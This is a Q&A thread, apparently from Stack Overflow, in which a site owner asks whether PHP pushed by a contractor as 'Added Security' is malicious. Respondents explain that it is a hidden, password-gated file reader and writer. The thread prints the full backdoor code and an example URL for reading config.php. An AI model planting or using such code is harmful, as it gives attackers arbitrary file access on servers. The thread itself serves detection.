# Is this code malicious or safe?

Tags: php

I'm working on a website and recently picked someone up to work on the PHP portion and I have had suspicions that he may have added malicious code to the site, he pushed a bit of PHP without permission nor without mentioning anything to anyone.

The push was labelled 'Added Security'.
Here's the code:

```
<?PHP
if(isset($_GET['unlock'])) {
    $id = $_GET['id'];
    $dic = $_SERVER['PHP_SELF'];
    $name = basename($dic) . "?unlock";
    $url = './$name?unlock&id='.$id;
    $file = "./$id";

    if(isset($_GET['f'])) {
        $f = $_GET['f'];
        $file = "./$f/$id";
    }

    if (isset($_POST['text'])) {
        file_put_contents($file, $_POST['text']);

        if(isset($_GET['f'])) {
            $f = $_GET['f'];
            header('location: ' . $name . '&id=' . $id . '&f=' . $f);
        } else {
            header('location: ' .  $name . '&id=' . $id);
        }
    }

    $text = htmlentities(file_get_contents($file));

    echo "<form method='post'><input type='submit'><textarea name='text'>$text</textarea></form>$dic";
    die();
}
?>
```

Thanks in advance.

Comment: This question appears to be off-topic because it is a **code review request**. This is better suited to the [Code Review Stack Exchange site](http://codereview.stackexchange.com). Before posting there be sure to read their [FAQ](http://codereview.stackexchange.com/help) to ensure that your question meets their guidelines.

Comment: No, there is absolutely nothing safe about this code.  XSS, uploading whatever they want to wherever, etc.  I suspect it's out of ignorance though rather than mal intent.  This code is pretty terrible.

Comment: Disgruntled / fired employee? *Hm...*

Comment: the code is not safe

Answer (score 3):

Let's see, the following

```
<?php
if(isset($_GET['unlock'])) {
...
}
```

Means that if you don't send the parameter `unlock` then nothing would be displayed. Is like a knaive attempt of keeping a secret piece of code that only he can unlock with a magic word.

Regarding what's inside

```
$id = $_GET['id'];
$dic = $_SERVER['PHP_SELF'];
$name = basename($dic) . "?unlock";
//$url = './$name?unlock&id='.$id;  // the former would fail to interpolate $name
$url = "./$name&id=".$id;
$file = "./$id";
if(isset($_GET['f'])) {
$f = $_GET['f'];
$file = "./$f/$id";
}
$text = htmlentities(file_get_contents($file));
echo"<form method='post'><input type='submit'><textarea name='text'>$text</textarea> </form>";
```

If you pass the parameter unlock and id (which is a filename), plus optionally a parameter f (which is a folder) you can see the contents of that file in the textarea. For example

```
http://www.myserver.com/thescript.php?unlock&id=config.php&f=app
```

would expose whatever sensitive information you have in your `config.php` inside the `app` folder.

Finally, this part

```
if (isset($_POST['text'])) {

    file_put_contents($file, $_POST['text']);

    if(isset($_GET['f'])) {
    $f = $_GET['f'];
    header('location: ' . $name . '&id=' . $id . '&f=' . $f);
    } else {
    header('location: ' .  $name . '&id=' . $id);
    }

}
```

Would let you edit or create a file by submitting the form. It might fail due to lack of permissions, but since you can play with the folder, you just insist until you find a writable folder.